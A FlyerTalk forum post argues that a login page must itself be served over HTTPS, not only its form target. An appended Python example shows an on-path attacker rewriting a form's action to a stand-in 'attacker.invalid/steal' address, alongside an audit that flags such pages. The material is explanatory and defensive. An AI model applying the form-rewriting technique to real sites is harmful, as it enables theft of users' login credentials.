FlyerTalk Forums - View Single Post - Household account hacked and Avios stolen
Nov 13, 2015 | 5:19 am
  #33  
chp
 
Join Date: Mar 2013
Programs: BAEC Silver
Posts: 55
Originally Posted by Gshumway
Once again, that statement made by people is WRONG. When pressing the login button (submitting the form with your login information) you are connecting to a HTTPS URL, it is secure.
No, no, no! I'm afraid that THIS comment reflects a widely-held, but completely wrong (or WRONG) misconception. In order to properly protect submitted data, not only does the destination URL have to be encrypted (i.e. use HTTPS), but the original page the data is entered onto needs to be as well.

The reason for this is that if a login page (the main BA page for example) is served over plain HTTP and not encrypted then it is "relatively"* straightforward for an evil-doer to change the login / main page. They could alter the destination that the login form sends the data to, thus bypassing or nullifying the correct "HTTPS" URL, or inject other malicious content. Unless you check the main page source each time you load it, you cannot be sure that the destination for your login data hasn't been modified to send it somewhere else. Even if you do check the page source, your data could still be hijacked using various techniques involving JavaScript.

For further details and very useful guidelines see the OWASP cheat sheet: https://www.owasp.org/index.php/Tran...nticated_Pages

In short, for proper protection of HTML form submitted data both the page with the form AND the form handler / destination URL should be protected by being served over HTTPS.

* The relative simplicity of doing this depends on several factors and may vary from being very simple to quite difficult. But it definitely is possible.
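The attack chp describes, as an added example that is not part of the original post or any FlyerTalk or BA code: the first function shows how little work an on-path attacker needs to do to an HTTP-delivered page to redirect a login form that posts to an HTTPS URL, and the second is a small audit that flags exactly the condition the post and the OWASP guidance warn about (a password form on a page that was not itself served over HTTPS). The sample page, the example.com URLs and the attacker.invalid destination are constructed for the example and stand in for nothing real.

```python
"""
Added example (not from the FlyerTalk post): why the page carrying a login
form, not just the form's action URL, must be served over HTTPS.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed sample: a login page as it might be delivered over plain HTTP.
# The form itself posts to an HTTPS endpoint, which is the "it's secure" claim.
SAMPLE_PAGE_URL = "http://www.example.com/"
SAMPLE_HTML = """<html><body>
<form id="login" method="post" action="https://www.example.com/login">
  <input type="text" name="username">
  <input type="password" name="password">
  <input type="submit" value="Log in">
</form>
</body></html>"""


class FormCollector(HTMLParser):
    """Collects every <form>, its resolved action URL and whether it carries a password field."""

    def __init__(self, base_url):
        super().__init__()
        self.base_url = base_url
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            # An empty or missing action means "post back to the page URL".
            action = attrs.get("action") or ""
            self._current = {"action": urljoin(self.base_url, action), "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (attrs.get("type") or "").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def tamper_form_action(html, attacker_url):
    """What an on-path attacker does to an unencrypted HTTP response: rewrite the
    form's action attribute. The user still sees the genuine page; only the
    place the credentials are submitted to has changed (attacker_url is hypothetical)."""
    pattern = re.compile(r'(<form\b[^>]*\baction=)"[^"]*"', re.IGNORECASE)
    return pattern.sub(lambda m: m.group(1) + '"' + attacker_url + '"', html)


def audit_login_page(page_url, html):
    """Return a list of findings for password forms on the page. The key check is
    the one the post makes: the page scheme matters, not only the action scheme."""
    findings = []
    page_scheme = urlsplit(page_url).scheme.lower()
    collector = FormCollector(page_url)
    collector.feed(html)
    for form in collector.forms:
        if not form["has_password"]:
            continue
        action_scheme = urlsplit(form["action"]).scheme.lower()
        if page_scheme != "https":
            findings.append(
                "password form on a page served over %s; an on-path attacker can rewrite it "
                "(action: %s)" % (page_scheme, form["action"])
            )
        if action_scheme != "https":
            findings.append("password form submits over %s to %s" % (action_scheme, form["action"]))
    return findings


if __name__ == "__main__":
    print("Original page:", audit_login_page(SAMPLE_PAGE_URL, SAMPLE_HTML))
    # The attacker's rewritten page still has an HTTPS action, so checking the
    # action alone would have passed it; the page scheme is what gives it away.
    tampered = tamper_form_action(SAMPLE_HTML, "https://attacker.invalid/steal")
    print("Tampered page:", audit_login_page(SAMPLE_PAGE_URL, tampered))
    print("Same page over HTTPS:", audit_login_page("https://www.example.com/", SAMPLE_HTML))
```

Note that the tampered form still submits to an HTTPS URL, so a check that only looks at the action scheme passes it; only the scheme of the page that delivered the form distinguishes the two cases, which is the post's point.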